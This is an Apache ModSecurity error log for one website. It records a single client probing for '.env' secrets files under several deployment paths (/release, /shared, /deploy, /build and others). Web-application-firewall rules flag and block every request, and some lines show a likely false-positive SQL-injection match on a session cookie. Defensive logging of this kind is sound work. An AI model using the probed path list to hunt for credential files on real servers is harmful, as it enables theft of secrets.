[Mon May 11 14:09:58.538393 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/var/www/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzgAAAQ4"]
[Mon May 11 14:09:58.538591 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/var/www/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzgAAAQ4"]
[Mon May 11 14:09:58.538849 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/var/www/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzgAAAQ4"]
[Mon May 11 14:09:58.845504 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/var/www/html/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzwAAAQ4"]
[Mon May 11 14:09:58.845882 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/var/www/html/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzwAAAQ4"]
[Mon May 11 14:09:58.846063 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/var/www/html/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzwAAAQ4"]
[Mon May 11 14:09:58.846338 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/var/www/html/.env"] [unique_id "agHHFlchVQ3tCn0m9OpAzwAAAQ4"]
[Mon May 11 14:09:59.028716 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/current/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0AAAAQ4"]
[Mon May 11 14:09:59.029102 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/current/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0AAAAQ4"]
[Mon May 11 14:09:59.029295 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/current/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0AAAAQ4"]
[Mon May 11 14:09:59.029539 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/current/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0AAAAQ4"]
[Mon May 11 14:09:59.179401 2026] [core:error] [pid 1319885:tid 1319918] [client 52.242.216.199:59607] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:59.179424 2026] [core:error] [pid 1319885:tid 1319918] [client 52.242.216.199:59607] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:59.221996 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/release/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0gAAAQ4"]
[Mon May 11 14:09:59.222406 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/release/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0gAAAQ4"]
[Mon May 11 14:09:59.222592 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/release/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0gAAAQ4"]
[Mon May 11 14:09:59.222833 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/release/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0gAAAQ4"]
[Mon May 11 14:09:59.391278 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/releases/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0wAAAQ4"]
[Mon May 11 14:09:59.391658 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/releases/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0wAAAQ4"]
[Mon May 11 14:09:59.391850 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/releases/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0wAAAQ4"]
[Mon May 11 14:09:59.392091 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/releases/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA0wAAAQ4"]
[Mon May 11 14:09:59.614663 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/shared/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1AAAAQ4"]
[Mon May 11 14:09:59.615082 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/shared/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1AAAAQ4"]
[Mon May 11 14:09:59.615279 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/shared/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1AAAAQ4"]
[Mon May 11 14:09:59.615563 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/shared/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1AAAAQ4"]
[Mon May 11 14:09:59.803651 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/deploy/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1QAAAQ4"]
[Mon May 11 14:09:59.804033 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/deploy/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1QAAAQ4"]
[Mon May 11 14:09:59.804228 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/deploy/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1QAAAQ4"]
[Mon May 11 14:09:59.804484 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/deploy/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1QAAAQ4"]
[Mon May 11 14:09:59.992509 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/build/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1wAAAQ4"]
[Mon May 11 14:09:59.992906 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/build/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1wAAAQ4"]
[Mon May 11 14:09:59.993086 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/build/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1wAAAQ4"]
[Mon May 11 14:09:59.993340 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/build/.env"] [unique_id "agHHF1chVQ3tCn0m9OpA1wAAAQ4"]
[Mon May 11 14:10:00.166699 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/dist/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA2QAAAQ4"]
[Mon May 11 14:10:00.167066 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/dist/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA2QAAAQ4"]
[Mon May 11 14:10:00.167265 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/dist/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA2QAAAQ4"]
[Mon May 11 14:10:00.167504 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/dist/.env"] [unique_id "agHHGFchVQ3tCn0m9OpA2QAAAQ4"]
